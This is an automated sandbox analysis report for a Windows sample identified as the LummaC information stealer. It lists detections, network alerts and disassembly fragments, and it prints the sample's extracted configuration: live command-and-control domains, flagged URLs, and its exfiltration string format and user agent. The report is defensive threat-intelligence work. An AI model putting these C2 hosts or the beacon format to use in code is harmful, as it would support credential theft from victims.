Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
rHrG691f7q.exe

Overview

General Information

Sample name:rHrG691f7q.exe
renamed because original name is a hash value
Original sample name:f610013d7c84f779afa017218890e7ce.exe
Analysis ID:1575138
MD5:f610013d7c84f779afa017218890e7ce
SHA1:b804e0105708cc52b09137bfd2b76c5515577e3a
SHA256:69b0f2ca7e883e86bc905febffef4e074ef837451faa9e88dbba74fda64319a1
Tags:exeuser-abuse_ch
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
Performs DNS queries to domains with low reputation
Sample uses string decryption to hide its real strings
AV process strings found (often used to terminate AV products)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • rHrG691f7q.exe (PID: 7476 cmdline: "C:\Users\user\Desktop\rHrG691f7q.exe" MD5: F610013D7C84F779AFA017218890E7CE)
    • 1A68.tmp.exe (PID: 7844 cmdline: "C:\Users\user\AppData\Local\Temp\1A68.tmp.exe" MD5: D88E2431ABAC06BDF0CD03C034B3E5E3)
      • WerFault.exe (PID: 2828 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7844 -s 612 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["effecterectz.xyz", "immureprech.biz", "deafeninggeh.biz", "debonairnukk.xyz", "wrathful-jammy.cyou", "awake-weaves.cyou", "sordid-snaked.cyou", "diffuculttan.xyz"], "Build id": "4h5VfH--"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000003.00000003.2274703518.00000000024E0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
      00000003.00000002.2433571436.00000000008C9000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
      • 0x1640:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
      00000003.00000002.2433977170.0000000002490000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
        00000003.00000002.2433977170.0000000002490000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
        • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
        00000003.00000002.2433138560.0000000000400000.00000040.00000001.01000000.00000006.sdmpJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
          Click to see the 3 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          3.3.1A68.tmp.exe.24e0000.0.raw.unpackJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
            3.2.1A68.tmp.exe.400000.0.unpackJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
              3.2.1A68.tmp.exe.400000.0.raw.unpackJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
                3.3.1A68.tmp.exe.24e0000.0.unpackJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security

                  Sigma Signatures

                  No Sigma rule has matched

                  Suricata Signatures

                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-14T14:16:27.357655+010020283713Unknown Traffic192.168.2.649752104.21.22.222443TCP
                  2024-12-14T14:16:29.854582+010020283713Unknown Traffic192.168.2.649759104.21.96.1443TCP
                  2024-12-14T14:16:33.573527+010020283713Unknown Traffic192.168.2.64976823.55.153.106443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-14T14:16:28.405476+010020546531A Network Trojan was detected192.168.2.649752104.21.22.222443TCP
                  2024-12-14T14:16:30.731798+010020546531A Network Trojan was detected192.168.2.649759104.21.96.1443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-14T14:16:28.405476+010020498361A Network Trojan was detected192.168.2.649752104.21.22.222443TCP
                  2024-12-14T14:16:30.731798+010020498361A Network Trojan was detected192.168.2.649759104.21.96.1443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-14T14:16:29.854582+010020582151Domain Observed Used for C2 Detected192.168.2.649759104.21.96.1443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-14T14:16:27.357655+010020582231Domain Observed Used for C2 Detected192.168.2.649752104.21.22.222443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-14T14:16:31.670893+010020582101Domain Observed Used for C2 Detected192.168.2.6622141.1.1.153UDP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-14T14:16:28.412659+010020582141Domain Observed Used for C2 Detected192.168.2.6544611.1.1.153UDP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-14T14:16:31.222907+010020582161Domain Observed Used for C2 Detected192.168.2.6512881.1.1.153UDP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-14T14:16:30.999936+010020582181Domain Observed Used for C2 Detected192.168.2.6564281.1.1.153UDP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-14T14:16:30.739913+010020582201Domain Observed Used for C2 Detected192.168.2.6494931.1.1.153UDP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-14T14:16:25.984571+010020582221Domain Observed Used for C2 Detected192.168.2.6643531.1.1.153UDP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-14T14:16:25.760174+010020582261Domain Observed Used for C2 Detected192.168.2.6638591.1.1.153UDP
                  2024-12-14T14:16:31.897603+010020582261Domain Observed Used for C2 Detected192.168.2.6527961.1.1.153UDP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-14T14:16:31.448194+010020582361Domain Observed Used for C2 Detected192.168.2.6645551.1.1.153UDP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-14T14:16:18.900335+010028032742Potentially Bad Traffic192.168.2.649722104.21.56.70443TCP
                  2024-12-14T14:16:20.657689+010028032742Potentially Bad Traffic192.168.2.649726176.113.115.1980TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-14T14:16:34.423166+010028586661Domain Observed Used for C2 Detected192.168.2.64976823.55.153.106443TCP

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Antivirus / Scanner detection for submitted sample
                  Source: rHrG691f7q.exeAvira: detected
                  Antivirus detection for URL or domain
                  Source: https://wrathful-jammy.cyou/~Avira URL Cloud: Label: malware
                  Source: https://deafeninggeh.biz/zAvira URL Cloud: Label: malware
                  Source: https://effecterectz.xyz/apiSAvira URL Cloud: Label: malware
                  Source: https://wrathful-jammy.cyou/apiAvira URL Cloud: Label: malware
                  Source: https://diffuculttan.xyz/apiAvira URL Cloud: Label: malware
                  Source: https://post-to-me.com/track_prt.php?sub=0&cc=DENAvira URL Cloud: Label: malware
                  Source: https://deafeninggeh.biz/apiyAvira URL Cloud: Label: malware
                  Source: https://awake-weaves.cyou/apiZAvira URL Cloud: Label: malware
                  Source: https://effecterectz.xyz/api8Avira URL Cloud: Label: malware
                  Antivirus detection for dropped file
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeAvira: detection malicious, Label: HEUR/AGEN.1312567
                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\ScreenUpdateSync[1].exeAvira: detection malicious, Label: HEUR/AGEN.1312567
                  Found malware configuration
                  Source: 3.3.1A68.tmp.exe.24e0000.0.raw.unpackMalware Configuration Extractor: LummaC {"C2 url": ["effecterectz.xyz", "immureprech.biz", "deafeninggeh.biz", "debonairnukk.xyz", "wrathful-jammy.cyou", "awake-weaves.cyou", "sordid-snaked.cyou", "diffuculttan.xyz"], "Build id": "4h5VfH--"}
                  Multi AV Scanner detection for dropped file
                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\ScreenUpdateSync[1].exeReversingLabs: Detection: 42%
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeReversingLabs: Detection: 42%
                  Multi AV Scanner detection for submitted file
                  Source: rHrG691f7q.exeReversingLabs: Detection: 55%
                  Source: rHrG691f7q.exeVirustotal: Detection: 40%Perma Link
                  AI detected suspicious sample
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                  Machine Learning detection for dropped file
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeJoe Sandbox ML: detected
                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\ScreenUpdateSync[1].exeJoe Sandbox ML: detected
                  Machine Learning detection for sample
                  Source: rHrG691f7q.exeJoe Sandbox ML: detected
                  Sample uses string decryption to hide its real strings
                  Source: 00000003.00000003.2274703518.00000000024E0000.00000004.00001000.00020000.00000000.sdmpString decryptor: sordid-snaked.cyou
                  Source: 00000003.00000003.2274703518.00000000024E0000.00000004.00001000.00020000.00000000.sdmpString decryptor: awake-weaves.cyou
                  Source: 00000003.00000003.2274703518.00000000024E0000.00000004.00001000.00020000.00000000.sdmpString decryptor: wrathful-jammy.cyou
                  Source: 00000003.00000003.2274703518.00000000024E0000.00000004.00001000.00020000.00000000.sdmpString decryptor: debonairnukk.xyz
                  Source: 00000003.00000003.2274703518.00000000024E0000.00000004.00001000.00020000.00000000.sdmpString decryptor: diffuculttan.xyz
                  Source: 00000003.00000003.2274703518.00000000024E0000.00000004.00001000.00020000.00000000.sdmpString decryptor: effecterectz.xyz
                  Source: 00000003.00000003.2274703518.00000000024E0000.00000004.00001000.00020000.00000000.sdmpString decryptor: deafeninggeh.biz
                  Source: 00000003.00000003.2274703518.00000000024E0000.00000004.00001000.00020000.00000000.sdmpString decryptor: immureprech.biz
                  Source: 00000003.00000003.2274703518.00000000024E0000.00000004.00001000.00020000.00000000.sdmpString decryptor: sordid-snaked.cyou
                  Source: 00000003.00000003.2274703518.00000000024E0000.00000004.00001000.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
                  Source: 00000003.00000003.2274703518.00000000024E0000.00000004.00001000.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
                  Source: 00000003.00000003.2274703518.00000000024E0000.00000004.00001000.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
                  Source: 00000003.00000003.2274703518.00000000024E0000.00000004.00001000.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
                  Source: 00000003.00000003.2274703518.00000000024E0000.00000004.00001000.00020000.00000000.sdmpString decryptor: Workgroup: -
                  Source: 00000003.00000003.2274703518.00000000024E0000.00000004.00001000.00020000.00000000.sdmpString decryptor: 4h5VfH--

                  Compliance

                  barindex
                  Detected unpacking (overwrites its own PE header)
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeUnpacked PE file: 0.2.rHrG691f7q.exe.400000.0.unpack
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeUnpacked PE file: 3.2.1A68.tmp.exe.400000.0.unpack
                  Source: rHrG691f7q.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                  Source: unknownHTTPS traffic detected: 104.21.56.70:443 -> 192.168.2.6:49722 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.22.222:443 -> 192.168.2.6:49752 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.6:49759 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 23.55.153.106:443 -> 192.168.2.6:49768 version: TLS 1.2
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeCode function: 0_2_004389F2 FindFirstFileExW,0_2_004389F2
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeCode function: 0_2_024F8C59 FindFirstFileExW,0_2_024F8C59
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then cmp dword ptr [edi+ebp*8], E88DDEA1h3_2_0043CD60
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then cmp al, 2Eh3_2_00426054
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then jmp eax3_2_00426054
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then cmp dword ptr [esi+ebp*8], B1025CF1h3_2_0043B05D
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then movzx esi, byte ptr [esp+edx-57437DD5h]3_2_0043B05D
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then cmp dword ptr [esi+ebp*8], B1025CF1h3_2_0043B068
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then movzx esi, byte ptr [esp+edx-57437DD5h]3_2_0043B068
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then movzx ebx, byte ptr [eax+ecx-3F9DFECCh]3_2_0040E83B
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then cmp dword ptr [esi+ebp*8], B1025CF1h3_2_0043B05B
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then movzx esi, byte ptr [esp+edx-57437DD5h]3_2_0043B05B
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then mov ecx, eax3_2_0040A940
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then mov edx, ecx3_2_0040A940
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+38h]3_2_0040C917
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then jmp ecx3_2_0043C1F0
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 67F3D776h3_2_00425990
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then movzx ecx, di3_2_00425990
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then movzx esi, byte ptr [esp+edx-57437DD5h]3_2_0043B195
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then movsx eax, byte ptr [esi]3_2_0043B9A1
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], A269EEEFh3_2_004369A0
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then movzx ebx, byte ptr [ecx+edx]3_2_0041E9B0
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]3_2_004299B0
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then lea eax, dword ptr [esp+18h]3_2_0042526A
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then mov ebx, edi3_2_0041D270
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then mov esi, eax3_2_00423A34
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then cmp dword ptr [ecx+edi*8], 2298EE00h3_2_0043D2F0
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then movzx edx, word ptr [eax]3_2_0043D2F0
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then jmp ecx3_2_0043C280
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then movzx ebx, byte ptr [edi+eax]3_2_00415298
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then mov word ptr [eax], dx3_2_00415298
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then mov ecx, eax3_2_0043AAB2
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then mov word ptr [ebp+00h], 0000h3_2_004252BA
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then cmp dword ptr [ebx+esi*8], B430E561h3_2_004252BA
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then mov eax, ebx3_2_0041CB05
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], CAA82E26h3_2_0043CB20
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then mov edx, eax3_2_00427326
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then mov ecx, eax3_2_004143C2
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then mov edi, dword ptr [esp+34h]3_2_004143C2
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then add ebp, dword ptr [esp+0Ch]3_2_0042A3D0
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then mov ecx, eax3_2_0042C45C
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then mov ebp, dword ptr [eax]3_2_00436C00
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+000000B8h]3_2_0042B4FC
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then mov ecx, eax3_2_0042B4FC
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then mov ecx, dword ptr [esi+64h]3_2_00418578
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then mov edx, eax3_2_0042750D
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then mov ecx, eax3_2_00421D10
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then movzx edi, byte ptr [edx+ecx]3_2_0040DD25
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then mov ecx, edx3_2_0040BDC9
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then movzx edi, byte ptr [edx+eax-000000BFh]3_2_00417582
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then movzx edi, byte ptr [esp+ecx+0233DBB1h]3_2_00427DA2
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then cmp word ptr [ebx+ecx], 0000h3_2_004205B0
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then mov byte ptr [esi], cl3_2_0042C64A
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then mov ecx, eax3_2_0042AE48
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then jmp eax3_2_00426E50
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+000000B8h]3_2_0042B4F7
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then mov ecx, eax3_2_0042B4F7
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then mov ecx, eax3_2_0042AE24
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then movzx ebx, byte ptr [edx]3_2_00433630
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then mov byte ptr [esi], cl3_2_0042C6E4
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+20h]3_2_00425E90
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then cmp dword ptr [edi+ebp*8], 88822328h3_2_0043CE90
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then mov word ptr [eax], cx3_2_004166A0
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then mov word ptr [eax], cx3_2_0041BEA0
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then mov ecx, eax3_2_0042ADF4
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then mov eax, edx3_2_0041C6BB
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then jmp eax3_2_0043BF40
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then movzx edi, byte ptr [edx+eax-000000A8h]3_2_00415F66
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], A896961Ch3_2_00419770
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 6E83E51Eh3_2_00419770
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then cmp dword ptr [ebp+ebx*8+00h], 6E83E51Eh3_2_00419770
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 67F3D776h3_2_00419770
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 67F3D776h3_2_00419770
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], B7C1BB11h3_2_00419770
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 6E83E51Eh3_2_00419770
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], B430E561h3_2_00419770
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then mov edx, dword ptr [ebp-10h]3_2_0043A777
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-78E52646h]3_2_00409700
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then movzx edi, byte ptr [esp+eax-46h]3_2_00409700
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+16h]3_2_00409700
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then mov byte ptr [esi], cl3_2_0042C726
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then mov byte ptr [esi], cl3_2_0042C735
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then mov byte ptr [edi], al3_2_0040CFF3
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then movzx eax, byte ptr [eax+ecx-6A653384h]3_2_0040CFF3
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then mov byte ptr [ebp+00h], al3_2_0041DF80
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then movzx edx, byte ptr [esi+eax-00000089h]3_2_0040D7A2
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then movzx edx, byte ptr [esi+eax-00000089h]3_2_0040D7A2
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then mov byte ptr [edi], al3_2_0249D25A
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then movzx eax, byte ptr [eax+ecx-6A653384h]3_2_0249D25A
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then jmp eax3_2_024CC268
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then cmp dword ptr [esi+ebp*8], B1025CF1h3_2_024CB2CF
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then movzx esi, byte ptr [esp+edx-57437DD5h]3_2_024CB2CF
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then cmp dword ptr [esi+ebp*8], B1025CF1h3_2_024CB2C4
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then movzx esi, byte ptr [esp+edx-57437DD5h]3_2_024CB2C4
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then cmp dword ptr [esi+ebp*8], B1025CF1h3_2_024CB2C2
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then movzx esi, byte ptr [esp+edx-57437DD5h]3_2_024CB2C2
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then movzx esi, byte ptr [esp+edx-57437DD5h]3_2_024CB3FC
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then cmp al, 2Eh3_2_024B63B6
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then mov ecx, edx3_2_0249C030
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then jmp eax3_2_024B70E4
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then cmp dword ptr [edi+ebp*8], 88822328h3_2_024CD0F7
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+20h]3_2_024B60F7
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then mov ecx, eax3_2_024BB08B
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then mov ecx, eax3_2_024BB0AF
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then mov ecx, eax3_2_024BB05B
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then mov byte ptr [ebp+00h], al3_2_024AE1E7
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then add ebp, dword ptr [esp+0Ch]3_2_024BA637
